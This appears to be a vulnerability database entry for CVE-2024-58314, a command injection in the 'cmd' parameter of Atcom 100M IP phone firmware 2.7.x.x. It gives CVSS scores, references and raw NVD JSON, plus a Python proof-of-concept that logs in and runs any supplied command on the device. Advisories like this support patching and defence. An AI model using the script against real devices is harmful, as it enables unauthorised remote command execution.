CVE-2024-58314

Description

Atcom 100M IP Phones firmware version 2.7.x.x contains an authenticated command injection vulnerability in the web configuration CGI script that allows attackers to execute arbitrary system commands. Attackers can inject shell commands through the 'cmd' parameter in web_cgi_main.cgi, enabling remote code execution with administrative credentials.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Atcom 100M IP Phone firmware 2.7.x.x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2024-58314 PoC - Authenticated Command Injection in Atcom 100M IP Phone
# Target: web_cgi_main.cgi

def exploit(target_ip, username, password, cmd):
    """
    Exploit authenticated command injection in Atcom 100M IP Phone
    Args:
        target_ip: Target device IP address
        username: Valid admin username
        password: Valid admin password
        cmd: Command to execute on the target
    """
    login_url = f"http://{target_ip}/cgi-bin/login.cgi"
    exploit_url = f"http://{target_ip}/cgi-bin/web_cgi_main.cgi"
    
    # Step 1: Authenticate to obtain session
    login_data = {
        "username": username,
        "password": password
    }
    
    session = requests.Session()
    login_response = session.post(login_url, data=login_data)
    
    if login_response.status_code != 200:
        print(f"[-] Authentication failed")
        return False
    
    # Step 2: Inject command via cmd parameter
    exploit_data = {
        "cmd": f"{cmd}"  # Command injection point
    }
    
    response = session.get(exploit_url, params=exploit_data)
    
    print(f"[+] Command executed: {cmd}")
    print(f"[+] Response: {response.text}")
    return True

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_ip> <username> <password> <command>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    command = sys.argv[4]
    
    exploit(target, user, pwd, command)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-58314
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-58314
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-58314/
[4] VulDB https://vuldb.com/cve/CVE-2024-58314
[5] https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
[6] https://www.exploit-db.com/exploits/51742
[7] https://www.vulncheck.com/advisories/atcom-xx-authenticated-command-injection-via-web-configuration-cgi

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-58314", "sourceIdentifier": "[email protected]", "published": "2025-12-12T20:15:39.327", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Atcom 100M IP Phones firmware version 2.7.x.x contains an authenticated command injection vulnerability in the web configuration CGI script that allows attackers to execute arbitrary system commands. Attackers can inject shell commands through the 'cmd' parameter in web_cgi_main.cgi, enabling remote code execution with administrative credentials."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51742", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/atcom-xx-authenticated-command-injection-via-web-configuration-cgi", "source": "[email protected]"}]}}